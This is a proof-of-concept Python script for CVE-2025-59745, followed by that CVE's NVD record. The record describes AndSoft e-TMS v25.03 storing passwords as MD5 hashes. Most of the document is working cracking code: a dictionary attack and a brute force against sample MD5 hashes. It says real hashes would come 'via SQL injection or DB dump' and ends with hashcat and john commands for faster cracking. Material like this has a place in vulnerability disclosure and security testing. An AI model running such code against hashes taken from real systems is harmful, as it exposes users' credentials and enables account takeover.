CVE-2025-59745

# CVE-2025-59745 PoC: MD5 Password Hash Cracking for AndSoft e-TMS # This PoC demonstrates how to crack MD5-hashed passwords extracted from AndSoft e-TMS v25.03 import hashlib import itertools import string from concurrent.futures import ThreadPoolExecutor # Sample MD5 hash extracted from AndSoft e-TMS database # (In real scenario, this would be obtained via SQL injection or DB dump) sample_hashes = [ "5d41402abc4b2a76b9719d911017c592", # MD5("hello") "e10adc3949ba59abbe56e057f20f883e", # MD5("123456") "25d55ad283aa400af464c76d713c07ad", # MD5("12345678") "d8578edf8458ce06fbc5bb76a58c5ca4", # MD5("qwerty") ] # Common password wordlist (in real scenario, use rockyou.txt or similar) common_passwords = [ "admin", "password", "123456", "12345678", "qwerty", "abc123", "monkey", "master", "dragon", "login", "hello", "shadow", "sunshine", "princess", "football", "charlie", "letmein", "welcome", "admin123", "root" ] def check_password(hash_to_crack, password): """Check if a password matches the given MD5 hash""" md5_hash = hashlib.md5(password.encode()).hexdigest() return md5_hash == hash_to_crack, password def crack_md5_dictionary(target_hash, wordlist): """Dictionary attack on MD5 hash""" print(f"[*] Attempting dictionary attack on hash: {target_hash}") for password in wordlist: result, pwd = check_password(target_hash, password) if result: print(f"[+] PASSWORD CRACKED: {pwd} -> {target_hash}") return pwd return None def crack_md5_bruteforce(target_hash, max_length=4): """Brute force attack on short MD5 hashes""" print(f"[*] Attempting brute force on hash: {target_hash}") chars = string.ascii_lowercase + string.digits for length in range(1, max_length + 1): for combo in itertools.product(chars, repeat=length): password = ''.join(combo) result, pwd = check_password(target_hash, password) if result: print(f"[+] PASSWORD CRACKED: {pwd} -> {target_hash}") return pwd return None def demonstrate_vulnerability(): print("=" * 60) print("CVE-2025-59745 - AndSoft e-TMS MD5 Hash Cracking PoC") print("=" * 60) for target_hash in sample_hashes: print(f"\n[*] Target hash: {target_hash}") # Try dictionary attack first result = crack_md5_dictionary(target_hash, common_passwords) if not result: # Fallback to brute force for short passwords result = crack_md5_bruteforce(target_hash, max_length=4) if result: print(f"[+] Successfully cracked: {result}") else: print(f"[-] Failed to crack hash: {target_hash}") print("\n[*] Demonstration complete.") print("[*] In production, use hashcat or john the ripper for faster cracking:") print(" hashcat -m 0 hashes.txt rockyou.txt") print(" john --format=raw-md5 hashes.txt") if __name__ == "__main__": demonstrate_vulnerability()

{"cve": {"id": "CVE-2025-59745", "sourceIdentifier": "[email protected]", "published": "2025-10-02T15:15:54.130", "lastModified": "2025-10-02T19:45:31.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the cryptographic algorithm of AndSoft's e-TMS v25.03, which uses MD5 to encrypt passwords. MD5 is a cryptographically vulnerable hash algorithm and is no longer considered secure for storing or transmitting passwords. It is vulnerable to collision attacks and can be easily cracked with modern hardware, exposing user credentials to potential risks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:andsoft:e-tms:25.03:*:*:*:*:*:*:*", "matchCriteriaId": "DA9BDB99-4B85-46EF-A8EA-B0E7B1DCF276"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/update-24092025-multiple-vulnerabilities-andsofts-e-tms", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}